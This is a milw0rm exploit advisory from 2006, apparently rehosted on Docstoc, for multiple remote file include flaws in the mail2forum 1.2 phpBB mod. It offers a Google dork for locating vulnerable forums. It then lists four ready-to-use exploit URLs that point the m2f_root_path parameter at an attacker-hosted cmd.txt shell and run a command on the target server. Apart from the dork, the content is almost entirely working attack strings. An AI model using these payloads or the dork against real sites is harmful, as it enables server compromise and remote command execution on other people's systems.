Docstoc

mail2forum phpBB Mod 1.2 m2f_root_path Remote Include Vulns

Document Sample
mail2forum phpBB Mod 1.2 m2f_root_path Remote Include Vulns Powered By Docstoc
					                    mail2forum phpBB Mod 1.2 m2f_root_path Remote Include Vulns                               Page 1/1
  1    Title : mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities
  2
  3    ###############################################################################
  4
  5    Discovered By OLiBekaS
  6
  7    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  8
  9    Affected software description :
  10   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  11
  12   Application : mail for phpbb (bulletin board/forum software)
  13   version : latest version [ 1.2 ]
  14   URL : http://www.www.mail2forum.com
  15
  16   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  17
  18   dork       : allinurl:/m2f_usercp.php?
  19
  20   Exploit     :
  21   http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
  22   http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
  23   http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
  24   http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
  25
  26   # milw0rm.com [2006−07−17]




OLiBekaS                                                                                                      07/17/2006

				
DOCUMENT INFO